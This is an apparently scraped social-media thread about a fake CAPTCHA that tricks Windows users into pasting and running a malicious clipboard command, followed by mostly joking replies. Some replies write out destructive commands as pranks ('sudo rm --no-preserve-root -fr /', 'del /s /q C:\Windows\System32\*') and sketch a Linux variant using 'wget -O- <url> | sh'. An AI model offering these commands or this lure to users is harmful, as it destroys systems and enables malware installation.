qontor
kravietz π¦No, this is no a new CAPTCHA, this is a new malware vector which tricks users to open #Windows command line and paste a command to download some harmful stuff.
Just reported by Mohamed Aruham on Twitter.
πͺπΊ Paul Schoonhoven ππ@kravietz @MelodIetje glad -not- to be on Windows again.. π
uexo
Markus G πͺπΊ@uexo @vosje62 @kravietz @MelodIetje # remove your French language pack, all of it from the root up. It uses too much space.
sudo rm βno-preserve-root -fr /
sudo rm βno-preserve-root -fr /
@uexo @vosje62 @kravietz @MelodIetje Donβt hand out sudo to inexperienced users on shared systems. If you run your own system, know what you are doing.
tech
Rickyx
uhhhhhh@vosje62 @kravietz @MelodIetje Verification Steps:
1. Press Ctrl+Alt+T
2. Press Ctrl+Shift+V
3. Press Enter
please find a better reason to criticize windows it's not that hard
Ken πβ πΊπ¦β 
βC'mon, Folks. It's one thing to *have* a computer, quite another to *own* it.
Frank Heijkamp@kravietz That is very bad. It is not working on my non-windows machine.
steev hise@kravietz βverify youβre human by doing something stupidβ ππ
Kayla βIacovino with an iβ
Deus
Smart Fox@kravietz at least that means that Windows is getting better at security. Now it's time to explain how computers work and that privacy also matters
Medea Vanamondeπ³οΈββ§οΈ β
JustChomik@kravietz Do you know what command gets copied to the clipboard? Would be curious to reverse engineer it
vΜΎiΜΎtΜΎrΜΎiΜΎoΜΎlΜΎiΜΎxΜΎ@JustChomik @kravietz "ping google.com"
@vitriolix yes... It's definitely it..
(moved)Galbinus Caeli π―@kravietz Well, it does prove you are human. No robot would fall for that.
chuckadeus kummerer@kravietz beautiful
xyhhx π»
Courtney MertzI'd be able to tell that this is malware quite easily!
Xenotime | Science/Coding VTuber@kravietz Thanks for the psa, thatβs like bad and worrying but also kind of hilarious.
βYo boss how we gonna get more people to get getting our malware?β
βCanβt you just tell them users to run it? Just, ya know, ask nicely?β
βUhh yeah sure bossβ
citrus@kravietz awesome. new horrors await at work.
[Yaseenist] CauseOfBSOD@kravietz verification steps:
1) press windows button + r
2) type "cmd"
3) press enter
4) realise that windows doesnt ship with a whois program and you cant look up the registrars abuse contact
1) press windows button + r
2) type "cmd"
3) press enter
4) realise that windows doesnt ship with a whois program and you cant look up the registrars abuse contact
@kravietz also what happens if the user agent is from a browser on a mac? or on a phone or tablet? or on linux?
TomBerend@kravietz it DOES prove you are human. No bot would be this gullible...
NewkOnly humans fall for this scam. 
Pixlar
gunstick@kravietz oh, you can't add the return into the paste buffer?
a*m**@kravietz
1. press Windows Button + [enter]
2. press CTRL+Shift+V
3. press Enter
fixed to run in gnu linux distro with default i3 config.
Paul Shryock@kravietz π π
Joel Pomales@kravietz I don't see how something like this would work on #Linux.
Let's say you achieve this. You copy text for bash commands. It would have to be a long ass string of commands and if it needs something to be installed, you would need to elevate your privileges. It won't allow any program or any script to run.
This is a uniquely Windows problem, IMO.
Snep 
@joelpomales @kravietz Not really. Most common Linux distros have a Terminal on Windows/Meta + T and from there it'd be the same, but instead of PowerShell you'd copy something like "wget -O- <url> | sh" into the users clipboard. wgwt and sh are included on pretty much any mainstream distro
masterX244@joelpomales
most linuxes have curl and you can rely on a posix-compatible shell under sh, curl blablahblah |sh for getting the real long string in
most linuxes have curl and you can rely on a posix-compatible shell under sh, curl blablahblah |sh for getting the real long string in
Dennis β
@joelpomales @kravietz User permissions are enough to exfil the browserβs cookie database on any OS. Thatβs usually what the crooks are after.
rustybikes π§
Cyverification steps
1. open a console
2. del /s /q C:\Windows\System32\*
3. reboot
1. open a console
2. del /s /q C:\Windows\System32\*
3. reboot
nanpa Walijo@kravietz
I ASPIRE to be as creative as some of these hackers! /j
I ASPIRE to be as creative as some of these hackers! /j
Kevin Karhan 
Wave@kkarhan @[email protected] While this is an effective method or preventing this particular scam, it can be edited for Linux if we were to ever get to the point where Linux market share is worth exploiting. E.g, instead of "Super + R" they could say "Ctrl + Alt + T" and have a terminal opened
Wyatt (π³οΈββ§οΈβ?)@kravietz ugh now MS will disable the run dialog which is literally the only way i can survive using windows 10 or 11 for 5 minutes
Maven 
β@wyatt8740 @[email protected] shift + f10
opens cmd
you can also use task manager (Ctrl+shift+esc) and then go to file>run
and gpedit.msc can enable/disable run iirc
opens cmd
you can also use task manager (Ctrl+shift+esc) and then go to file>run
and gpedit.msc can enable/disable run iirc
@Maven i'm not really interested in solving it because i run neither win10 nor win11 on the regular and i have no access to gpedit on corporate computers usually. Just indicating that once again things like this are making computing worse for everyone
Gustavo@kravietz I wonder how effective it is since people failing to it might be stupid enough not to notice they are pasting a command but must be smart enough to know how to press the Windows key + R.
πΉππππHello. I am a Moldovan virus. Due to the terrible poverty of my creator and the low level of technology development in our country, I am not able to cause any harm to your computer. Therefore I ask you very much: erase some important file for you and then send me by mail to other addressees. I am grateful in advance for your understanding and cooperation. Β© π€£
JRaccoon@kravietz Anyone know what the actual commands it adds to the clipboard are? Would be interesting to know
Zeitreisender@kravietz
Indeed, a nice social hack.
Indeed, a nice social hack.
Matthew Flint@kravietz
Itβs not stupid if it works!
Itβs not stupid if it works!
@kravietz So the prompt is correct, then.
ErosBlog Bacchus has moved!@kravietz My first unkind thought was "Please verify that you are stupid" and then I realized just how deep (how many years) into my own history of relationship with computing I'd have to go to put a date on when I learned the significance of #1 and #2 "verification steps". It is, literally, arcane knowledge, that few would ever learn in the normal course of their lives in 2024.
The Computer Cellar@kravietz any analysis of what it's installing? Because I'm sure some of my customers won't hesitate to follow the steps.
soc@kravietz Cool idea to be honest β perhaps I *should* start using something like this as a "real" captcha!
Strypey@kravietz
> this is no a new CAPTCHA, this is a new malware vector which tricks users to open Windows command line and paste a command to download some harmful stuff
We really must stop web browsers accessing any other part of our computers without explicit permission...
@kravietz So, like many other vectors, it relies on people not knowing what the hell they are doing on a computer. Windows R is the shortcut to bring up a run command box. CTRL-V is, of course paste (who doesn't know that?). The people will see the command the attackers want to run in the run box. Enter, of course, runs that command. This is quite similar to people driving off a cliff following their GPS.
They are targeting low hanging fruit that can not find the CTRL key.